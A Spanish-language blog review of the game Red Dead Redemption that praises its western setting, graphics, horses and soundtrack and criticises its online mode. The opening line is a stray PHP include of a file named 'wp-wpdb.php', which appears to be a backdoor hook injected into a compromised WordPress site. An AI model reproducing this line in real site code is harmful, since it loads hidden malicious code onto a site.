if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Red Dead Redemption – La Fortaleza de LeChuck

Análisis Red Dead Redemption

Hubo un tiempo, no hace mucho, en la historia de E.E.U.U. en lo que lo más valioso que podía poseer un hombre era un caballo sano, un revólver cargado, una bolsa de monedas de oro y su honor… y ésto último en muchas ocasiones era prescindible. Esto es Red Dead Redemption.
La gente no olvida, nada se perdona (John Marston)

En las últimas coletadas de éste salvaje mundo nos sitúa Red Dead Redemption, desarrollado por Rockstar en sus estudios Rockstar North y Rockstar Sandiego, haciendo lo que mejor saben, un sandbox lleno de posibilidades, de situaciones, con un nivel artístico que roza la maestría y unos personajes que transmiten sentimientos como poco juegos saben hacer.

La historia nos pone en la piel de John Marston, un antiguo forajido ya retirado que intenta vivir en paz y armonía con su família en un rancho de vacas en el territorio de West Elizabeth hasta que una mañana unos agentes de la ley irrumpen en su placentera vida proponiendo «un trato», se trata de que Marston debe dedicarse a la captura vivo o muerto de su antiguo compañero de fechorías y jefe de su ex-banda Bill Williamson para ajustar sus antiguas cuentas con la justicia, eso sí, para asegurarse de que John cumple con su deber raptan a su mujer y a su hijo. No sé a vosotros, pero eso a mí me huele a chantaje y oye, despertarse de buena mañana con esas noticias no sienta nada bien.

Los pasos de nuestro héroe nos llevarán por el árido y lejano Oeste americano (representado en el juego como la zona de New Austin), en el México fronterizo en plena revolución (Nuevo Paraíso) y a un industrializado Este americano (West Elizabeth). En la búsqueda de redención encontrarás nuevos amigos y sobretodo enemigos, todos claramente fieles a los clichés típicos de los personajes de los western, el borracho, el granjero, el buscador de tesoros, el sheriff y su ayudante, el enterrador… como en todo sandbox éstos personajes son los que te hacen avanzar en la historia encomiándote misiones que no siempre tienen que ver con la trama principal pero que le da variedad al asunto. Éstas misiones suelen tratarse de asaltar fortalezas de bandidos, escoltar o conducir carromatos, rescatar a pobres inocentes, lo típico de cualquier juego marca de la casa.

Además Red Dead Redemption también cuenta con una gran variedad de misiones secundarias tales como ser cazarrecompensas de los bandidos más buscados, cazar animales salvajes (ojo con los legendarios) e incluso juegos de apuestas como el póquer (Texas Hold ‘em), el dado mentiroso (muy divertido si tienes la última expansión y puedes jugarlo online con los colegas), lanzamiento de herradura. También en tus largos trayectos a caballo irán saltando misiones aleatorias como recuperar el carromato robado a una pobre dama o capturar a unos presos que se han escapado de su custodia con el lazo.

Cómo veis es un juego lleno de posibilidades, que de buen seguro te enganchará hasta que hayas completado el 100% de él, cosa nada fácil.

Como decía al principio de éste análisis creo que el apartado gráfico y artístico de Red Dead Redemption podría ser tachado de obra maestra. Para que entendáis lo que quiero decir os remito a este vídeo realizado con time-lapse:

Unos paisajes llenos de vida tanto en flora como en fauna salvaje, las puestas de sol que nos hacen entender el significado de la palabra HDR y animaciones faciales que si bien no llegan al nivel de L.A. Noire llegan a hacer palidecer a la mayoría de juegos que presumen de ser unos «triple A».
Cada zona de Red Dead Redemption está caracterizada a nivel paisajístico incluyendo flora y fauna, por ejemplo, en la zona de Tall Trees, al Norte, se distingue por sus montañas nevadas, cabañas de madera, abetos, osos, lobos y ciervos. En cambio, al Sur, en la zona de Armadillo, nos encontraremos rodeados del típico desierto mejicano, con sus poblados de casitas blancas de adobe, cactus y coyotes.

Mención aparte merecen los caballos, nuestro fiel amigo, que en Red Dead Redemption obtiene la mejor representación que ha tenido éste animal en un videojuego (ojo al dato Assassin’s Creed), los chicos de Rockstar han sabido plasmar incluso la musculatura y el movimiento de la crin de dicho animal, como decía, soberbio.

Cualquier aficionado al género western sabrá que la música es tan o más importante que las escenas de acción en los filmes, películas legendarias del género siempre han tenido una banda sonora a la altura, y el juego llamado a ser el referente en el género western de los videojuegos no podría ser diferente. La música de Red Dead Redemption está compuesta por Bill Elm y Woody Jackson es un perfecto homenaje a la películas de antaño pero sin dejar de sonar actual, el tema principal del juego es un buen ejemplo de ello.

Mención especial para los temas cantados, pocos pero realzan los momentos clave del juego, como Far Away de José Gonzalez que salta cuando paseamos por primera vez por el territorio de Nuevo Paraíso, os recomiendo daros un tranquilo paseo con vuestro caballo bajo el cielo estrellado y disfrutar de las vistas, no tiene desperdicio.

Hay que mencionar que, si bien el doblaje y las voces de Red Dead Redemption son de gran calidad, están íntegramente en inglés, y aunque esté subtitulado en castellano aunque lo compres de importación eso es algo que va a tirar para atrás a mucha gente. Una mala costumbre de Rockstar aunque comprensible después de oír los grandes doblajes que hacen, de buen seguro que, viendo la gran mayoría de los doblajes que hacen de los videojuegos en español nos habríamos perdido bastante de la esencia de los acentos y entonacion es que tienen los personajes en algunos momentos de la historia.

Bueno, después de comentar todas las bondades de Red Dead Redemption he de comentar el que para mí es el único punto negro del juego, su modo multijugador online. Después de jugar unas cuantas horas en todos los modos he de confesar que, a excepción de los juegos de apuestas incluidos en la expansión Mentirosos y Tramposos en los que puedes echar unas partidas de póquer y dado mentiroso, el resto de modos no me han llamado la atención especialmente. Tal vez pueda encontrar una explicación en el control del juego, es un control que no se presta a los modos de juego de los shooters más tradicionales, es bueno para el modo en solitario pero demasiado engorroso para la rapidez en los duelos multijugador. Además aunque las salas de juego están limitadas únicamente para 16 jugadores no gozan de una conexión muy estable y, aún y habiéndolo mejorado bastante a base de parches, sigue habiendo problemas para crear grupos de amigos con los que poder echar unas partidas online.

Por lo consiguiente el modo online acaba basándose en un modo para hacer el cabra en el modo libre con los amigos al estilo GTA pero en lugar de con coches con caballos así que a las pocas horas de juego se acaba aborreciendo.

Red Dead Redemption es un juego al que tienes que jugar al menos una vez en tu vida, en su género es de lo mejor que puedas jugar en una consola. Es un juego excelente en la mayoría de los apartados y seguro que te encandilará si eres aficionado al género western.

Lo mejor:
  • Gráficamente excelente, los paisajes y la vida natural de estos es alucinante.
  • La música, imprescindible adquirir ésta pedazo de B.S.O.